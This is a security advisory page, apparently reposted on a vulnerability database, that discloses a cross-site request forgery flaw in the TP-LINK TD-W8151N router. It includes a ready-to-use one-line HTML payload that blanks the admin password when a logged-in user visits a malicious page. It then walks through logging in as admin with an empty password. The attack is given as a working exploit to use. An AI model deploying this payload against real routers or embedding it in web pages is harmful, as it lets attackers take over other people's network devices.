Bug: TP-LINK TD-W8151N Cross Site Request Forgery ( Ascii Version )

Search:
WLB2

TP-LINK TD-W8151N Cross Site Request Forgery

Published / (Updated)
Credit
Risk
2012-10-03 / 2014-03-04
AkaStep
Medium
CWE
CVE
Local
Remote
CWE-352
N/A ( Add )
No
Yes

=====================================================================
Vulnerable Software/Or Device: TP-LINK TD-W8151N 150Mbps Wireless N ADSL+2 modem Router
Vendor: http://www.tp-linkru.com/
Vuln: CROSS SITE REQUEST FORGERY (CSRF)
How it looks?: http://s52.radikal.ru/i137/1210/47/b60496b61adf.jpg
=====================================================================
Tested on Windows XP SP2 (32 bit)
Browser: Firefox 15.0.1
=====================================================================
What i can say? I can say only : Nice and Powerfull Device but insecure.

This modem Router (TD-W8151N 150Mbps Wireless N ADSL+2 modem Router) is vulnerable to CROSS SITE REQUEST FORGERY
vulnerability).

Theris no need to change modem password using $_POST request method.(Because $_GET does it for you)

$_GET
http://LOCAL_IP_ADDRESS/Forms/tools_admin_1

will reset current modem password to empty(blank) password if the current logged user/admin into modem visits malicious
page which contains the following "payload".

=========CSRF EXPLOIT===================
<img src="http://192.168.1.1/Forms/tools_admin_1"/>
=========SAVE IT AS exploit.html============

modem password will be set to empty password.

Then attacker only needs to enter:
http://_LOCAL_OR_REMOTE_IP_ADDR_OF_VICTIM/

Account name: admin
And
Password: *LEAVE_IT_EMPTY_I_MEAN_BLANK*


Thats all.

=====================================================================

SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
=====================================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
=====================================================================

/AkaStep

References:

http://s52.radikal.ru/i137/1210/47/b60496b61adf.jpg
http://www.tp-linkru.com/
http://arstechnica.com/security/2014/03/hackers-hijack-300000-plus-wireless-routers-make-malicious-changes/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version